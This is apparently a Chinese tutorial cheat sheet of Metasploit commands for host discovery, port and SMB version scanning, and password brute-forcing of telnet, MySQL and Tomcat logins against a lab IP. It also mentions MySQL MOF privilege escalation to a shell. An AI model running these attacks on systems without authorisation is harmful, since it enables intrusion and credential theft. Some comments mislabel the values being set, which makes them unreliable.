metasploit常用模块使用命令-信息收集
使用arp_sweep模块来发现存活的主机
search arp_sweep //查询此模块下的攻击模块
use 查询出来的攻击模块 //加载攻击模块
show options //查看一下该模块需要配置的选项参数
set RHOSTS 192.168.20.20 //使用set命令将RHOSTS设置为目标电脑的IP
exploit //进行攻击
使用Metasploit的SYN端口扫描器对单个主机进行一次简单的扫描
use auxiliary/scanner/portscan/syn //加载SYN端口扫描器
show options //查看一下该模块需要配置的选项参数
set RHOSTS 192.168.20.20 //使用set命令将RHOSTS设置为目标电脑的IP
exploit //进行攻击
使用smb_version模块对目标主机的系统版本进行探测
search smb_version //查询此模块下的攻击模块
use 查询出来的攻击模块 //加载攻击模块
show options //查看一下该模块需要配置的选项参数
set RHOSTS 192.168.20.20 //使用set命令将RHOSTS设置为目标电脑的IP
exploit //进行攻击
使用telnet_login模块对目标主机的telnet服务进行系统密码爆破
使用nmap扫描出开放的23端口,即可使用telnet模块进行爆破
search telnet_login //查询此模块下的攻击模块
use 查询出来的攻击模块 //加载攻击模块
show options //查看一下该模块需要配置的选项参数
set RHOSTS 192.168.20.20 //使用set命令将RHOSTS设置为目标电脑的IP
set PASS_FILE pass //使用set命令将PASS_FILE设置为使用文件名字为pass的密码本进行爆破
set USERNAME root //使用set命令将USERNAME设置用户名为root
使用mysql_login模块对目标主机的MySQL数据库进行爆破
search mysql_login //查询此模块下的攻击模块
use 查询出来的攻击模块 //加载攻击模块
show options //查看一下该模块需要配置的选项参数
set RHOSTS 192.168.20.20 //使用set命令将RHOSTS设置为目标电脑的IP
set PASS_FILE pass //使用set命令将PASS_FILE设置为使用文件名字为pass的密码本进行爆破
set USERNAME root //使用set命令将USERNAME设置用户名为root
查出密码后然后用mysql_enum查看数据库信息
mysql_mof模块进行提权 ,获得shell,低于mysql5.6版本
使用tomcat_mgr_login模块对目标主机的8180端口,也就是tomcat中间件进行登陆爆破
search tomcat_mgr_login //查询此模块下的攻击模块
use 查询出来的攻击模块 //加载攻击模块
show options //查看一下该模块需要配置的选项参数
set RHOSTS 192.168.20.20 //使用set命令将RHOSTS设置为目标电脑的IP
set USERNAME tomcat //使用set命令将USERNAME设置用户名为root USER_FILE
set PASSWORD tomcat //使用set命令将PASSWORD设置用户名为root PASS_FILE